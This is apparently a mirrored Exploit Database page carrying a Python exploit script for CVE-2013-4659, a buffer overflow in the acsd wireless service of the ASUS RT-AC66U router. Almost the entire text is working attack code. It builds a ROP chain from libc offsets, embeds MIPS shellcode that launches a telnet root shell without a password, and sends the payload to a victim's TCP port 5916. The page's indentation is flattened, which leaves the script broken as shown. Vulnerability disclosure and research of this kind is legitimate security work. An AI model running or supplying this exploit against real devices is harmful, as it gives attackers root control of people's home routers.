ASUS RT-AC66U – ‘acsd’ Remote Command Execution

• Exploit Database
• 13 阅读

• 作者： Jacob Holcomb
  日期： 2013-07-27
• 类别：

  • remote
  平台：

  • linux_mips
• 来源：https://www.exploit-db.com/exploits/27133/

• #!/usr/bin/env python
  
  import signal, struct
  from time import sleep
  from socket import *
  from sys import exit, exc_info
  
  #
  # Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
  # Discovered and Reported*June 2013 
  # Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
  #*Security Analsyts @ Independent Security Evaluators
  # Software Vendor*********http://asus.com
  # Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/
  # Software****************acsd wireless service (Listens on TCP/5916)
  # Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) 
  # CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
  #
  # Overview:
  #	The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple 
  # Buffer Overflow attacks.
  #
  # Multiple overflows exist in the following software:
  #
  #	- Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands)
  #														
  
  
  def sigHandle(signum, frm): # Signal handler
  
  print "\n[!!!] Cleaning up the exploit... [!!!]\n"
  sleep(1)
  exit(0)
  
  
  def targServer():
  
  while True:
  try:
  server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
  server = inet_ntoa(server)
  break
  except:
  print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
  sleep(1)
  continue
  
  return server 
  
  
  def main():
  
  print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
   [*] Discovered and Reported: June 2013
   [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE
   [*] Software Vendor: http://asus.com
   [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
   [*] Software: acsd wireless service (Listens on TCP/5916)
   [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)
   [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""")
  signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
  victim = targServer()
  port = int(5916)
  acsdCmd = "autochannel&param=" #Vulnerable command - JH
  
  # base address of .text section of libc.so.0 in acsd's address space
  libc_base = 0x2ab25000
  
  # ROP gadget #1
  # lui s0,0x2
  # lia0,1
  # movet9,s1
  # jalrt9
  # ori a1,s0,0x2
  ra1 = struct.pack("<L", libc_base + 0x2d39c)
  
  # ROP gadget #2
  # movet9,s3
  # lwra,44(sp)
  # lws4,40(sp)
  # lws3,36(sp)
  # lws2,32(sp)
  # lws1,28(sp)
  # lws0,24(sp)
  # jrt9
  s1 = struct.pack("<L", libc_base + 0x34358)
  
  # sleep() - used to force program context switch (cache flush)
  s3 = struct.pack("<L", libc_base + 0x2cb90)
  
  # ROP gadget #3
  # addiu a1,sp,24
  # lwgp,16(sp)
  # lwra,32(sp)
  # jrra
  # addiu sp,sp,40
  ra2 = struct.pack("<L", libc_base + 0xa1b0)
  
  # ROP gadget #4
  # movet9,a1
  # addiu a0,a0,56
  # jrt9
  # movea1,a2
  ra3 = struct.pack("<L", libc_base + 0x3167c)
  
  # jalr sp
  jalr_sp ="\x09\xf8\xa0\x03"
  
  JuNk = "\x42" * 510
  safeNop = "2Aa3"
  
  #80 Bytes system() Shellcode by Jacob Holcomb of ISE
  #Calling system() and executing telnetd -l /bin/sh
  shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
  shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
  shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
  shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
  shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
  shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
  shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
  shellcode += "\x41\x61\x33"
  
  sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
  sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
  sploit += safeNop + shellcode
  
  try:
  print "\n [*] Creating network socket."
  net_sock = socket(AF_INET, SOCK_STREAM)
  except:
  print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info() 
  sleep(1)
  exit(0)
  
  try:
  print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
  net_sock.connect((victim, port))
  except:
  print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
  sleep(1)
  exit(0)
   
  try:
  print """ [*] Attempting to exploit the acsd param command.
   [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
   [*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
  net_sock.send(sploit)
  sleep(1)
  except:
  print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
  sleep(1)
  exit(0)
  
  try:
  print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
   [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n"""
  net_sock.close()
  except:
  print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info()
  sleep(1)
  exit(0)
  
  
  if __name__ == "__main__":
  main()